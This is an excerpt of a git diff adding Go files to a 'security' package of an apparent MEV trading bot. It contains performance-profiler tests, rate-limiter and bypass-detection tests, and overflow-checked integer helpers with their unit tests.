Description: event.Description,
Timestamp: event.Timestamp,
Source: event.Source,
Data: event.Data,
}
alerts = append(alerts, alert)
count++
}
return alerts
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,586 @@
package security
import (
"encoding/json"
"runtime"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/fraktal/mev-beta/internal/logger"
)
func TestNewPerformanceProfiler(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
// Test with default config
profiler := NewPerformanceProfiler(testLogger, nil)
assert.NotNil(t, profiler)
assert.NotNil(t, profiler.config)
assert.Equal(t, time.Second, profiler.config.SamplingInterval)
assert.Equal(t, 24*time.Hour, profiler.config.RetentionPeriod)
// Test with custom config
customConfig := &ProfilerConfig{
SamplingInterval: 500 * time.Millisecond,
RetentionPeriod: 12 * time.Hour,
MaxOperations: 500,
MaxMemoryUsage: 512 * 1024 * 1024,
MaxGoroutines: 500,
MaxResponseTime: 500 * time.Millisecond,
MinThroughput: 50,
EnableGCMetrics: false,
EnableCPUProfiling: false,
EnableMemProfiling: false,
ReportInterval: 30 * time.Minute,
AutoOptimize: true,
}
profiler2 := NewPerformanceProfiler(testLogger, customConfig)
assert.NotNil(t, profiler2)
assert.Equal(t, 500*time.Millisecond, profiler2.config.SamplingInterval)
assert.Equal(t, 12*time.Hour, profiler2.config.RetentionPeriod)
assert.True(t, profiler2.config.AutoOptimize)
// Cleanup
profiler.Stop()
profiler2.Stop()
}
func TestOperationTracking(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Test basic operation tracking
tracker := profiler.StartOperation("test_operation")
time.Sleep(10 * time.Millisecond) // Simulate work
tracker.End()
// Verify operation was recorded
profiler.mutex.RLock()
profile, exists := profiler.operations["test_operation"]
profiler.mutex.RUnlock()
assert.True(t, exists)
assert.Equal(t, "test_operation", profile.Operation)
assert.Equal(t, int64(1), profile.TotalCalls)
assert.Greater(t, profile.TotalDuration, time.Duration(0))
assert.Greater(t, profile.AverageTime, time.Duration(0))
assert.Equal(t, 0.0, profile.ErrorRate)
assert.NotEmpty(t, profile.PerformanceClass)
}
func TestOperationTrackingWithError(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Test operation tracking with error
tracker := profiler.StartOperation("error_operation")
time.Sleep(5 * time.Millisecond)
tracker.EndWithError(assert.AnError)
// Verify error was recorded
profiler.mutex.RLock()
profile, exists := profiler.operations["error_operation"]
profiler.mutex.RUnlock()
assert.True(t, exists)
assert.Equal(t, int64(1), profile.ErrorCount)
assert.Equal(t, 100.0, profile.ErrorRate)
assert.Equal(t, assert.AnError.Error(), profile.LastError)
assert.False(t, profile.LastErrorTime.IsZero())
}
func TestPerformanceClassification(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
testCases := []struct {
name string
sleepDuration time.Duration
expectedClass string
}{
{"excellent", 1 * time.Millisecond, "excellent"},
{"good", 20 * time.Millisecond, "good"},
{"average", 100 * time.Millisecond, "average"},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
tracker := profiler.StartOperation(tc.name)
time.Sleep(tc.sleepDuration)
tracker.End()
profiler.mutex.RLock()
profile := profiler.operations[tc.name]
profiler.mutex.RUnlock()
assert.Equal(t, tc.expectedClass, profile.PerformanceClass)
})
}
}
func TestSystemMetricsCollection(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
config := &ProfilerConfig{
SamplingInterval: 100 * time.Millisecond,
RetentionPeriod: time.Hour,
}
profiler := NewPerformanceProfiler(testLogger, config)
defer profiler.Stop()
// Wait for metrics collection
time.Sleep(200 * time.Millisecond)
profiler.mutex.RLock()
metrics := profiler.metrics
resourceUsage := profiler.resourceUsage
profiler.mutex.RUnlock()
// Verify system metrics were collected
assert.NotNil(t, metrics["heap_alloc"])
assert.NotNil(t, metrics["heap_sys"])
assert.NotNil(t, metrics["goroutines"])
assert.NotNil(t, metrics["gc_cycles"])
// Verify resource usage was updated
assert.Greater(t, resourceUsage.HeapUsed, uint64(0))
assert.GreaterOrEqual(t, resourceUsage.GCCycles, uint32(0))
assert.False(t, resourceUsage.Timestamp.IsZero())
}
func TestPerformanceAlerts(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
config := &ProfilerConfig{
SamplingInterval: time.Second,
MaxResponseTime: 10 * time.Millisecond, // Very low threshold for testing
}
profiler := NewPerformanceProfiler(testLogger, config)
defer profiler.Stop()
// Trigger a slow operation to generate alert
tracker := profiler.StartOperation("slow_operation")
time.Sleep(50 * time.Millisecond) // Exceeds threshold
tracker.End()
// Check if alert was generated
profiler.mutex.RLock()
alerts := profiler.alerts
profiler.mutex.RUnlock()
assert.NotEmpty(t, alerts)
foundAlert := false
for _, alert := range alerts {
if alert.Operation == "slow_operation" && alert.Type == "response_time" {
foundAlert = true
assert.Contains(t, []string{"warning", "critical"}, alert.Severity)
assert.Greater(t, alert.Value, 10.0) // Should exceed 10ms threshold
break
}
}
assert.True(t, foundAlert, "Expected to find response time alert for slow operation")
}
func TestReportGeneration(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Generate some test data
tracker1 := profiler.StartOperation("fast_op")
time.Sleep(1 * time.Millisecond)
tracker1.End()
tracker2 := profiler.StartOperation("slow_op")
time.Sleep(50 * time.Millisecond)
tracker2.End()
// Generate report
report, err := profiler.GenerateReport()
require.NoError(t, err)
assert.NotNil(t, report)
// Verify report structure
assert.NotEmpty(t, report.ID)
assert.False(t, report.Timestamp.IsZero())
assert.NotEmpty(t, report.OverallHealth)
assert.GreaterOrEqual(t, report.HealthScore, 0.0)
assert.LessOrEqual(t, report.HealthScore, 100.0)
// Verify operations are included
assert.NotEmpty(t, report.TopOperations)
assert.NotNil(t, report.ResourceSummary)
assert.NotNil(t, report.TrendAnalysis)
assert.NotNil(t, report.OptimizationPlan)
// Verify resource summary
assert.GreaterOrEqual(t, report.ResourceSummary.MemoryEfficiency, 0.0)
assert.LessOrEqual(t, report.ResourceSummary.MemoryEfficiency, 100.0)
assert.GreaterOrEqual(t, report.ResourceSummary.CPUEfficiency, 0.0)
assert.LessOrEqual(t, report.ResourceSummary.CPUEfficiency, 100.0)
}
func TestBottleneckAnalysis(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Create operations with different performance characteristics
tracker1 := profiler.StartOperation("critical_op")
time.Sleep(200 * time.Millisecond) // This should be classified as poor/critical
tracker1.End()
tracker2 := profiler.StartOperation("good_op")
time.Sleep(1 * time.Millisecond) // This should be excellent
tracker2.End()
// Generate report to trigger bottleneck analysis
report, err := profiler.GenerateReport()
require.NoError(t, err)
// Should detect performance bottleneck for critical_op
assert.NotEmpty(t, report.Bottlenecks)
foundBottleneck := false
for _, bottleneck := range report.Bottlenecks {
if bottleneck.Operation == "critical_op" || bottleneck.Type == "performance" {
foundBottleneck = true
assert.Contains(t, []string{"medium", "high"}, bottleneck.Severity)
assert.Greater(t, bottleneck.Impact, 0.0)
break
}
}
// Note: May not always find bottleneck due to classification thresholds
if !foundBottleneck {
t.Log("Bottleneck not detected - this may be due to classification thresholds")
}
}
func TestImprovementSuggestions(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Simulate memory pressure by allocating memory
largeData := make([]byte, 100*1024*1024) // 100MB
_ = largeData
// Force GC to update memory stats
runtime.GC()
time.Sleep(100 * time.Millisecond)
// Create a slow operation
tracker := profiler.StartOperation("slow_operation")
time.Sleep(300 * time.Millisecond) // Should be classified as poor/critical
tracker.End()
// Generate report
report, err := profiler.GenerateReport()
require.NoError(t, err)
// Should have improvement suggestions
assert.NotNil(t, report.Improvements)
// Look for memory or performance improvements
hasMemoryImprovement := false
hasPerformanceImprovement := false
for _, suggestion := range report.Improvements {
if suggestion.Area == "memory" {
hasMemoryImprovement = true
}
if suggestion.Area == "operation_slow_operation" {
hasPerformanceImprovement = true
}
}
// At least one type of improvement should be suggested
assert.True(t, hasMemoryImprovement || hasPerformanceImprovement,
"Expected memory or performance improvement suggestions")
}
func TestMetricsExport(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Wait for some metrics to be collected
time.Sleep(100 * time.Millisecond)
// Test JSON export
jsonData, err := profiler.ExportMetrics("json")
require.NoError(t, err)
assert.NotEmpty(t, jsonData)
// Verify it's valid JSON
var metrics map[string]*PerformanceMetric
err = json.Unmarshal(jsonData, &metrics)
require.NoError(t, err)
assert.NotEmpty(t, metrics)
// Test Prometheus export
promData, err := profiler.ExportMetrics("prometheus")
require.NoError(t, err)
assert.NotEmpty(t, promData)
assert.Contains(t, string(promData), "# HELP")
assert.Contains(t, string(promData), "# TYPE")
assert.Contains(t, string(promData), "mev_bot_")
// Test unsupported format
_, err = profiler.ExportMetrics("unsupported")
assert.Error(t, err)
assert.Contains(t, err.Error(), "unsupported export format")
}
func TestThresholdConfiguration(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Verify default thresholds were set
profiler.mutex.RLock()
thresholds := profiler.thresholds
profiler.mutex.RUnlock()
assert.NotEmpty(t, thresholds)
assert.Contains(t, thresholds, "memory_usage")
assert.Contains(t, thresholds, "goroutine_count")
assert.Contains(t, thresholds, "response_time")
assert.Contains(t, thresholds, "error_rate")
// Verify threshold structure
memThreshold := thresholds["memory_usage"]
assert.Equal(t, "memory_usage", memThreshold.Metric)
assert.Greater(t, memThreshold.Warning, 0.0)
assert.Greater(t, memThreshold.Critical, memThreshold.Warning)
assert.Equal(t, "gt", memThreshold.Operator)
}
func TestResourceEfficiencyCalculation(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Create operations with different performance classes
tracker1 := profiler.StartOperation("excellent_op")
time.Sleep(1 * time.Millisecond)
tracker1.End()
tracker2 := profiler.StartOperation("good_op")
time.Sleep(20 * time.Millisecond)
tracker2.End()
// Calculate efficiencies
memEfficiency := profiler.calculateMemoryEfficiency()
cpuEfficiency := profiler.calculateCPUEfficiency()
gcEfficiency := profiler.calculateGCEfficiency()
throughputScore := profiler.calculateThroughputScore()
// All efficiency scores should be between 0 and 100
assert.GreaterOrEqual(t, memEfficiency, 0.0)
assert.LessOrEqual(t, memEfficiency, 100.0)
assert.GreaterOrEqual(t, cpuEfficiency, 0.0)
assert.LessOrEqual(t, cpuEfficiency, 100.0)
assert.GreaterOrEqual(t, gcEfficiency, 0.0)
assert.LessOrEqual(t, gcEfficiency, 100.0)
assert.GreaterOrEqual(t, throughputScore, 0.0)
assert.LessOrEqual(t, throughputScore, 100.0)
// CPU efficiency should be high since we have good operations
assert.Greater(t, cpuEfficiency, 50.0)
}
func TestCleanupOldData(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
config := &ProfilerConfig{
RetentionPeriod: 100 * time.Millisecond, // Very short for testing
}
profiler := NewPerformanceProfiler(testLogger, config)
defer profiler.Stop()
// Create some alerts
profiler.mutex.Lock()
oldAlert := PerformanceAlert{
ID: "old_alert",
Timestamp: time.Now().Add(-200 * time.Millisecond), // Older than retention
}
newAlert := PerformanceAlert{
ID: "new_alert",
Timestamp: time.Now(),
}
profiler.alerts = []PerformanceAlert{oldAlert, newAlert}
profiler.mutex.Unlock()
// Trigger cleanup
profiler.cleanupOldData()
// Verify old data was removed
profiler.mutex.RLock()
alerts := profiler.alerts
profiler.mutex.RUnlock()
assert.Len(t, alerts, 1)
assert.Equal(t, "new_alert", alerts[0].ID)
}
func TestOptimizationPlanGeneration(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Create test recommendations
recommendations := []PerformanceRecommendation{
{
Type: "immediate",
Priority: "high",
Category: "memory",
Title: "Fix Memory Leak",
ExpectedGain: 25.0,
},
{
Type: "short_term",
Priority: "medium",
Category: "algorithm",
Title: "Optimize Algorithm",
ExpectedGain: 40.0,
},
{
Type: "long_term",
Priority: "low",
Category: "architecture",
Title: "Refactor Architecture",
ExpectedGain: 15.0,
},
}
// Generate optimization plan
plan := profiler.createOptimizationPlan(recommendations)
assert.NotNil(t, plan)
assert.Equal(t, 80.0, plan.TotalGain) // 25 + 40 + 15
assert.Greater(t, plan.Timeline, time.Duration(0))
// Verify phase categorization
assert.Len(t, plan.Phase1, 1) // immediate
assert.Len(t, plan.Phase2, 1) // short_term
assert.Len(t, plan.Phase3, 1) // long_term
assert.Equal(t, "Fix Memory Leak", plan.Phase1[0].Title)
assert.Equal(t, "Optimize Algorithm", plan.Phase2[0].Title)
assert.Equal(t, "Refactor Architecture", plan.Phase3[0].Title)
}
func TestConcurrentOperationTracking(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Run multiple operations concurrently
numOperations := 100
done := make(chan bool, numOperations)
for i := 0; i < numOperations; i++ {
go func(id int) {
defer func() { done <- true }()
tracker := profiler.StartOperation("concurrent_op")
time.Sleep(1 * time.Millisecond)
tracker.End()
}(i)
}
// Wait for all operations to complete
for i := 0; i < numOperations; i++ {
<-done
}
// Verify all operations were tracked
profiler.mutex.RLock()
profile := profiler.operations["concurrent_op"]
profiler.mutex.RUnlock()
assert.NotNil(t, profile)
assert.Equal(t, int64(numOperations), profile.TotalCalls)
assert.Greater(t, profile.TotalDuration, time.Duration(0))
assert.Equal(t, 0.0, profile.ErrorRate) // No errors expected
}
func BenchmarkOperationTracking(b *testing.B) {
testLogger := logger.New("error", "text", "/tmp/test.log") // Reduce logging noise
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
b.ResetTimer()
b.RunParallel(func(pb *testing.PB) {
for pb.Next() {
tracker := profiler.StartOperation("benchmark_op")
// Simulate minimal work
runtime.Gosched()
tracker.End()
}
})
}
func BenchmarkReportGeneration(b *testing.B) {
testLogger := logger.New("error", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Create some sample data
for i := 0; i < 10; i++ {
tracker := profiler.StartOperation("sample_op")
time.Sleep(time.Microsecond)
tracker.End()
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
_, err := profiler.GenerateReport()
if err != nil {
b.Fatal(err)
}
}
}
func TestHealthScoreCalculation(t *testing.T) {
testLogger := logger.New("info", "text", "/tmp/test.log")
profiler := NewPerformanceProfiler(testLogger, nil)
defer profiler.Stop()
// Test with clean system (should have high health score)
health, score := profiler.calculateOverallHealth()
assert.NotEmpty(t, health)
assert.GreaterOrEqual(t, score, 0.0)
assert.LessOrEqual(t, score, 100.0)
assert.Equal(t, "excellent", health) // Should be excellent with no issues
// Add some performance issues
profiler.mutex.Lock()
profiler.operations["poor_op"] = &OperationProfile{
Operation: "poor_op",
PerformanceClass: "poor",
}
profiler.operations["critical_op"] = &OperationProfile{
Operation: "critical_op",
PerformanceClass: "critical",
}
profiler.alerts = append(profiler.alerts, PerformanceAlert{
Severity: "warning",
})
profiler.alerts = append(profiler.alerts, PerformanceAlert{
Severity: "critical",
})
profiler.mutex.Unlock()
// Recalculate health
health2, score2 := profiler.calculateOverallHealth()
assert.Less(t, score2, score) // Score should be lower with issues
assert.NotEqual(t, "excellent", health2) // Should not be excellent anymore
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,175 @@
package security
import (
"context"
"testing"
"time"
)
func TestEnhancedRateLimiter(t *testing.T) {
config := &RateLimiterConfig{
IPRequestsPerSecond: 5,
IPBurstSize: 10,
GlobalRequestsPerSecond: 10000, // Set high global limit
GlobalBurstSize: 20000, // Set high global burst
UserRequestsPerSecond: 1000, // Set high user limit
UserBurstSize: 2000, // Set high user burst
SlidingWindowEnabled: false, // Disabled for testing basic burst logic
SlidingWindowSize: time.Minute,
SlidingWindowPrecision: time.Second,
AdaptiveEnabled: false, // Disabled for testing basic burst logic
AdaptiveAdjustInterval: 100 * time.Millisecond,
SystemLoadThreshold: 80.0,
BypassDetectionEnabled: true,
BypassThreshold: 3,
CleanupInterval: time.Minute,
BucketTTL: time.Hour,
}
rl := NewEnhancedRateLimiter(config)
defer rl.Stop()
ctx := context.Background()
headers := make(map[string]string)
// Test basic rate limiting
for i := 0; i < 3; i++ {
result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
if !result.Allowed {
t.Errorf("Request %d should be allowed, but got: %s - %s", i+1, result.ReasonCode, result.Message)
}
}
// Test burst capacity (should allow up to burst size)
// We already made 3 requests, so we can make 7 more before hitting the limit
for i := 0; i < 7; i++ {
result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
if !result.Allowed {
t.Errorf("Request %d should be allowed within burst, but got: %s - %s", i+4, result.ReasonCode, result.Message)
}
}
// Now we should exceed the burst limit and be rate limited
for i := 0; i < 5; i++ {
result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
if result.Allowed {
t.Errorf("Request %d should be rate limited (exceeded burst)", i+11)
}
}
}
func TestSlidingWindow(t *testing.T) {
window := NewSlidingWindow(5, time.Minute, time.Second)
// Test within limit
for i := 0; i < 5; i++ {
if !window.IsAllowed() {
t.Errorf("Request %d should be allowed", i+1)
}
}
// Test exceeding limit
if window.IsAllowed() {
t.Error("Request should be denied after exceeding limit")
}
}
func TestBypassDetection(t *testing.T) {
detector := NewBypassDetector(3, time.Hour, time.Minute)
headers := make(map[string]string)
// Test normal behavior
result := detector.DetectBypass("127.0.0.1", "TestAgent", headers, false)
if result.BypassDetected {
t.Error("Normal behavior should not trigger bypass detection")
}
// Test bypass pattern (multiple rate limit hits)
for i := 0; i < 25; i++ { // Increased to trigger MEDIUM severity
result = detector.DetectBypass("127.0.0.1", "TestAgent", headers, true)
}
if !result.BypassDetected {
t.Error("Multiple rate limit hits should trigger bypass detection")
}
if result.Severity != "MEDIUM" && result.Severity != "HIGH" {
t.Errorf("Expected MEDIUM or HIGH severity, got %s", result.Severity)
}
}
func TestSystemLoadMonitor(t *testing.T) {
monitor := NewSystemLoadMonitor(100 * time.Millisecond)
defer monitor.Stop()
// Allow some time for monitoring to start
time.Sleep(200 * time.Millisecond)
cpu, memory, load, goroutines := monitor.GetCurrentLoad()
if cpu < 0 || cpu > 100 {
t.Errorf("CPU usage should be between 0-100, got %f", cpu)
}
if memory < 0 || memory > 100 {
t.Errorf("Memory usage should be between 0-100, got %f", memory)
}
if load < 0 {
t.Errorf("Load average should be positive, got %f", load)
}
if goroutines <= 0 {
t.Errorf("Goroutine count should be positive, got %d", goroutines)
}
}
func TestEnhancedMetrics(t *testing.T) {
config := &RateLimiterConfig{
IPRequestsPerSecond: 10,
SlidingWindowEnabled: true,
AdaptiveEnabled: true,
AdaptiveAdjustInterval: 100 * time.Millisecond,
BypassDetectionEnabled: true,
CleanupInterval: time.Second,
BypassThreshold: 5,
BypassDetectionWindow: time.Minute,
BypassAlertCooldown: time.Minute,
}
rl := NewEnhancedRateLimiter(config)
defer rl.Stop()
metrics := rl.GetEnhancedMetrics()
// Check that all expected metrics are present
expectedKeys := []string{
"sliding_window_enabled",
"adaptive_enabled",
"bypass_detection_enabled",
"system_cpu_usage",
"system_memory_usage",
"system_load_average",
"system_goroutines",
}
for _, key := range expectedKeys {
if _, exists := metrics[key]; !exists {
t.Errorf("Expected metric %s not found", key)
}
}
// Verify boolean flags
if metrics["sliding_window_enabled"] != true {
t.Error("sliding_window_enabled should be true")
}
if metrics["adaptive_enabled"] != true {
t.Error("adaptive_enabled should be true")
}
if metrics["bypass_detection_enabled"] != true {
t.Error("bypass_detection_enabled should be true")
}
}

View File

@@ -0,0 +1,54 @@
package security
import (
"fmt"
"math"
)
// SafeUint64ToUint32 converts uint64 to uint32 with overflow check
func SafeUint64ToUint32(value uint64) (uint32, error) {
if value > math.MaxUint32 {
return 0, fmt.Errorf("value %d exceeds maximum uint32 value %d", value, math.MaxUint32)
}
return uint32(value), nil
}
// SafeUint64ToInt64 converts uint64 to int64 with bounds check
func SafeUint64ToInt64(value uint64) (int64, error) {
if value > math.MaxInt64 {
return 0, fmt.Errorf("value %d exceeds maximum int64 value %d", value, math.MaxInt64)
}
return int64(value), nil
}
// SafeUint64ToUint32WithDefault converts uint64 to uint32 with overflow check and default value
func SafeUint64ToUint32WithDefault(value uint64, defaultValue uint32) uint32 {
if value > math.MaxUint32 {
return defaultValue
}
return uint32(value)
}
// SafeAddUint64 adds two uint64 values with overflow check
func SafeAddUint64(a, b uint64) (uint64, error) {
if a > math.MaxUint64-b {
return 0, fmt.Errorf("addition overflow: %d + %d exceeds maximum uint64 value", a, b)
}
return a + b, nil
}
// SafeSubtractUint64 subtracts b from a with underflow check
func SafeSubtractUint64(a, b uint64) (uint64, error) {
if a < b {
return 0, fmt.Errorf("subtraction underflow: %d - %d results in negative value", a, b)
}
return a - b, nil
}
// SafeMultiplyUint64 multiplies two uint64 values with overflow check
func SafeMultiplyUint64(a, b uint64) (uint64, error) {
if b != 0 && a > math.MaxUint64/b {
return 0, fmt.Errorf("multiplication overflow: %d * %d exceeds maximum uint64 value", a, b)
}
return a * b, nil
}

View File

@@ -0,0 +1,343 @@
package security
import (
"math"
"testing"
)
func TestSafeUint64ToUint32(t *testing.T) {
tests := []struct {
name string
input uint64
expected uint32
expectError bool
}{
{
name: "zero value",
input: 0,
expected: 0,
expectError: false,
},
{
name: "small positive value",
input: 1000,
expected: 1000,
expectError: false,
},
{
name: "max uint32 value",
input: math.MaxUint32,
expected: math.MaxUint32,
expectError: false,
},
{
name: "overflow value",
input: math.MaxUint32 + 1,
expected: 0,
expectError: true,
},
{
name: "large overflow value",
input: math.MaxUint64,
expected: 0,
expectError: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := SafeUint64ToUint32(tt.input)
if tt.expectError {
if err == nil {
t.Errorf("SafeUint64ToUint32(%d) expected error but got none", tt.input)
}
} else {
if err != nil {
t.Errorf("SafeUint64ToUint32(%d) unexpected error: %v", tt.input, err)
}
if result != tt.expected {
t.Errorf("SafeUint64ToUint32(%d) = %d, want %d", tt.input, result, tt.expected)
}
}
})
}
}
func TestSafeUint64ToInt64(t *testing.T) {
tests := []struct {
name string
input uint64
expected int64
expectError bool
}{
{
name: "zero value",
input: 0,
expected: 0,
expectError: false,
},
{
name: "small positive value",
input: 1000,
expected: 1000,
expectError: false,
},
{
name: "max int64 value",
input: math.MaxInt64,
expected: math.MaxInt64,
expectError: false,
},
{
name: "overflow value",
input: math.MaxInt64 + 1,
expected: 0,
expectError: true,
},
{
name: "max uint64 value",
input: math.MaxUint64,
expected: 0,
expectError: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := SafeUint64ToInt64(tt.input)
if tt.expectError {
if err == nil {
t.Errorf("SafeUint64ToInt64(%d) expected error but got none", tt.input)
}
} else {
if err != nil {
t.Errorf("SafeUint64ToInt64(%d) unexpected error: %v", tt.input, err)
}
if result != tt.expected {
t.Errorf("SafeUint64ToInt64(%d) = %d, want %d", tt.input, result, tt.expected)
}
}
})
}
}
func TestSafeUint64ToUint32WithDefault(t *testing.T) {
tests := []struct {
name string
input uint64
defaultValue uint32
expected uint32
}{
{
name: "valid value",
input: 1000,
defaultValue: 500,
expected: 1000,
},
{
name: "overflow uses default",
input: math.MaxUint32 + 1,
defaultValue: 500,
expected: 500,
},
{
name: "max valid value",
input: math.MaxUint32,
defaultValue: 500,
expected: math.MaxUint32,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := SafeUint64ToUint32WithDefault(tt.input, tt.defaultValue)
if result != tt.expected {
t.Errorf("SafeUint64ToUint32WithDefault(%d, %d) = %d, want %d",
tt.input, tt.defaultValue, result, tt.expected)
}
})
}
}
func TestSafeAddUint64(t *testing.T) {
tests := []struct {
name string
a uint64
b uint64
expected uint64
expectError bool
}{
{
name: "small values",
a: 100,
b: 200,
expected: 300,
expectError: false,
},
{
name: "zero addition",
a: 1000,
b: 0,
expected: 1000,
expectError: false,
},
{
name: "overflow case",
a: math.MaxUint64,
b: 1,
expected: 0,
expectError: true,
},
{
name: "near max valid",
a: math.MaxUint64 - 1,
b: 1,
expected: math.MaxUint64,
expectError: false,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := SafeAddUint64(tt.a, tt.b)
if tt.expectError {
if err == nil {
t.Errorf("SafeAddUint64(%d, %d) expected error but got none", tt.a, tt.b)
}
} else {
if err != nil {
t.Errorf("SafeAddUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
}
if result != tt.expected {
t.Errorf("SafeAddUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
}
}
})
}
}
func TestSafeMultiplyUint64(t *testing.T) {
tests := []struct {
name string
a uint64
b uint64
expected uint64
expectError bool
}{
{
name: "small values",
a: 100,
b: 200,
expected: 20000,
expectError: false,
},
{
name: "zero multiplication",
a: 1000,
b: 0,
expected: 0,
expectError: false,
},
{
name: "one multiplication",
a: 1000,
b: 1,
expected: 1000,
expectError: false,
},
{
name: "overflow case",
a: math.MaxUint64,
b: 2,
expected: 0,
expectError: true,
},
{
name: "large values overflow",
a: math.MaxUint64 / 2,
b: 3,
expected: 0,
expectError: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := SafeMultiplyUint64(tt.a, tt.b)
if tt.expectError {
if err == nil {
t.Errorf("SafeMultiplyUint64(%d, %d) expected error but got none", tt.a, tt.b)
}
} else {
if err != nil {
t.Errorf("SafeMultiplyUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
}
if result != tt.expected {
t.Errorf("SafeMultiplyUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
}
}
})
}
}
func TestSafeSubtractUint64(t *testing.T) {
tests := []struct {
name string
a uint64
b uint64
expected uint64
expectError bool
}{
{
name: "normal subtraction",
a: 1000,
b: 200,
expected: 800,
expectError: false,
},
{
name: "zero result",
a: 1000,
b: 1000,
expected: 0,
expectError: false,
},
{
name: "underflow case",
a: 100,
b: 200,
expected: 0,
expectError: true,
},
{
name: "subtract zero",
a: 1000,
b: 0,
expected: 1000,
expectError: false,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := SafeSubtractUint64(tt.a, tt.b)
if tt.expectError {
if err == nil {
t.Errorf("SafeSubtractUint64(%d, %d) expected error but got none", tt.a, tt.b)
}
} else {
if err != nil {
t.Errorf("SafeSubtractUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
}
if result != tt.expected {
t.Errorf("SafeSubtractUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
}
}
})
}
}

View File

@@ -0,0 +1,234 @@
package security
import (
"errors"
"fmt"
"math"
"math/big"
)
var (
// ErrIntegerOverflow indicates an integer overflow would occur
ErrIntegerOverflow = errors.New("integer overflow detected")
// ErrIntegerUnderflow indicates an integer underflow would occur
ErrIntegerUnderflow = errors.New("integer underflow detected")
// ErrDivisionByZero indicates division by zero was attempted
ErrDivisionByZero = errors.New("division by zero")
// ErrInvalidConversion indicates an invalid type conversion
ErrInvalidConversion = errors.New("invalid type conversion")
)
// SafeMath provides safe mathematical operations with overflow protection
type SafeMath struct {
// MaxGasPrice is the maximum allowed gas price in wei
MaxGasPrice *big.Int
// MaxTransactionValue is the maximum allowed transaction value
MaxTransactionValue *big.Int
}
// NewSafeMath creates a new SafeMath instance with security limits
func NewSafeMath() *SafeMath {
// 10000 Gwei max gas price
maxGasPrice := new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9))
// 10000 ETH max transaction value
maxTxValue := new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e18))
return &SafeMath{
MaxGasPrice: maxGasPrice,
MaxTransactionValue: maxTxValue,
}
}
// SafeUint8 safely converts uint64 to uint8 with overflow check
func SafeUint8(val uint64) (uint8, error) {
if val > math.MaxUint8 {
return 0, fmt.Errorf("%w: value %d exceeds uint8 max %d", ErrIntegerOverflow, val, math.MaxUint8)
}
return uint8(val), nil
}
// SafeUint32 safely converts uint64 to uint32 with overflow check
func SafeUint32(val uint64) (uint32, error) {
if val > math.MaxUint32 {
return 0, fmt.Errorf("%w: value %d exceeds uint32 max %d", ErrIntegerOverflow, val, math.MaxUint32)
}
return uint32(val), nil
}
// SafeUint64FromBigInt safely converts big.Int to uint64
func SafeUint64FromBigInt(val *big.Int) (uint64, error) {
if val == nil {
return 0, fmt.Errorf("%w: nil value", ErrInvalidConversion)
}
if val.Sign() < 0 {
return 0, fmt.Errorf("%w: negative value %s", ErrIntegerUnderflow, val.String())
}
if val.BitLen() > 64 {
return 0, fmt.Errorf("%w: value %s exceeds uint64 max", ErrIntegerOverflow, val.String())
}
return val.Uint64(), nil
}
// SafeAdd performs safe addition with overflow check
func (sm *SafeMath) SafeAdd(a, b *big.Int) (*big.Int, error) {
if a == nil || b == nil {
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
}
result := new(big.Int).Add(a, b)
// Check against maximum transaction value
